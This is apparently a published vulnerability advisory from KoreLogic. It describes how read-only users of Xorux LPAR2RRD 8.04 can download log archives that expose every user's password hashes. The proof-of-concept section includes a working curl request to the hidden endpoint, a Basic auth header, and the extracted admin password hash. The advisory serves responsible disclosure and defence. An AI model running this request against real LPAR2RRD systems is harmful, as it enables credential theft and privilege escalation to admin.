📄 Xorux LPAR2RRD 8.04 Information Disclosure

KL-001-2025-015: Xorux LPAR2RRD Read Only User Log Download Exposing Sensitive Information
    
    Title: Xorux LPAR2RRD Read Only User Log Download Exposing Sensitive Information
    Advisory ID: KL-001-2025-015
    Publication Date: 2025-07-28
    Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-015.txt
    
    
    1. Vulnerability Details
    
         Affected Vendor: Xorux
         Affected Product: LPAR2RRD
         Affected Version: 8.04 and prior
         Platform: Rocky Linux 8.10
         CWE Classification: CWE-648: Incorrect Use of Privileged APIs
         CVE ID: CVE-2025-54768
    
    
    2. Vulnerability Description
    
         An API endpoint that should be limited to web application
         administrators is hidden from, but accessible by, lower-level
         read only web application users. The endpoint can be used
         to download logs from the appliance configuration, exposing
         sensitive information.
    
    
    3. Technical Description
    
         A read-only user can access a web application endpoint by which
         logs are downloaded. The logs are in tar.gz format, and can
         be extracted to reveal sensitive information that a read-only
         user should not be privileged to view. These files include
         password hashes for all users within the Xormon Original web
         application. An authenticated, read-only attacker could leverage
         this vulnerability to obtain and attempt to crack password
         hashes for more privileged users, including the admin user.
    
    
    4. Mitigation and Remediation Recommendation
    
         Xorux released version 8.05, which includes a remediation
         for this vulnerability. See https://lpar2rrd.com/note800.php.
    
    
    5. Credit
    
         This vulnerability was discovered by Jim Becher of KoreLogic,
         Inc.
    
    
    6. Disclosure Timeline
    
         2025-07-17 : KoreLogic requests point-of-contact to securely
                      report several vulnerabilities to Xorux.
         2025-07-18 : Vendor provides [email protected] as the
                      point-of-contact, noting that they do not use PGP.
         2025-07-21 : KoreLogic submits this vulnerability and four
                      additional discoveries to Xorux.
         2025-07-23 : Vendor acknowledges receipt, stating that the issue
                      has been remediated and a new version of the
                      affected product will be available 2025-07-25.
         2025-07-25 : Xorux publishes updated version of the affected
                      product.
         2025-07-28 : KoreLogic public disclosure.
    
    
    7. Proof of Concept
    
             $ curl -kq --ignore-content-length -H "Authorization: Basic amJlY2hlcjpqYmVjaGVy" 
    'https://172.31.255.207/lpar2rrd-cgi/vmwcfg.sh?cmd=logs' -o logs-ignore.tar.gz
               % Total    % Received % Xferd  Average Speed   Time Time     Time  Current
                                          Dload  Upload   Total Spent    Left  Speed
             100  815k    0  815k    0     0   153k      0 --:--:-- 0:00:05 --:--:--     0
    
             $ ls -al logs-ignore.tar.gz
             -rw-rw-r-- 1 jbecher jbecher 835419 May 29 13:55 logs-ignore.tar.gz
    
             $ tar tvf logs-ignore.tar | egrep 'htusers.cfg|users.json'
             -rw-rw-rw- lpar2rrd/lpar2rrd      90 2025-04-02 16:19 etc/web_config/htusers.cfg
             -rw-rw-rw- lpar2rrd/lpar2rrd    1377 2025-04-02 16:19 etc/web_config/users.json
             ...
    
             $ tar xf logs-ignore.tar etc/web_config/htusers.cfg
    
             $ tar xf logs-ignore.tar etc/web_config/users.json
    
             $ cat etc/web_config/htusers.cfg
             admin:$apr1$CSoXefyw$wGe9K7Ld5ClOEozE4zC.T1
             jbecher:$apr1$gQ7dWXiz$g.m4JR/qNdJl.y0cg7NCb/
    
             $ more etc/web_config/users.json
             {
                "ACLimported" : false,
                "groups" : {
                   "admins" : {
                      "ACL" : {
                         "vms" : {},
                         "cgroups" : [
                            "*"
                         ],
                         "pools" : {},
                         "solo" : {},
                         "lpars" : {}
                      },
                      "description" : "LPAR2RRD Administrators"
                   },
                   "ReadOnly" : {
                      "description" : "Member can see everything but nothing can change."
                   }
                },
                "users" : {
                   "admin" : {
                      "last_login" : "",
                      "config" : {
                         "db_width" : 120,
                         "timezone" : "",
                         "db_height" : 50,
                         "db_items" : [],
                         "locale" : "en-US",
                         "menu_width" : 150
                      },
                      "updated" : "2022-03-28T13:47:11Z",
                      "groups" : [
                         "admins"
                      ],
                      "email" : "",
                      "active" : 1,
                      "created" : "2022-03-28T13:47:11Z",
                      "name" : "LPAR2RRD Administrator",
                      "htpassword" : "$apr1$CSoXefyw$wGe9K7Ld5ClOEozE4zC.T1"
                   },
                   "jbecher" : {
                      "active" : true,
                      "config" : {
                         "timezone" : null
                      },
                      "email" : "[email protected]",
                      "groups" : [
                         "ReadOnly"
                      ],
                      "htpassword" : "$apr1$gQ7dWXiz$g.m4JR/qNdJl.y0cg7NCb/",
                      "created" : "2025-04-02T20:18:59Z",
                      "name" : "Jim Becher"
                   }
                }
             }
    
    
    The contents of this advisory are copyright(c) 2025
    KoreLogic, Inc. and are licensed under a Creative Commons
    Attribution Share-Alike 4.0 (United States) License:
    http://creativecommons.org/licenses/by-sa/4.0/
    
    KoreLogic, Inc. is a founder-owned and operated company with a
    proven track record of providing security services to entities
    ranging from Fortune 500 to small and mid-sized companies. We
    are a highly skilled team of senior security consultants doing
    by-hand security assessments for the most important networks in
    the U.S. and around the world. We are also developers of various
    tools and resources aimed at helping the security community.
    https://www.korelogic.com/about-korelogic.html
    
    Our public vulnerability disclosure policy is available at:
    https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy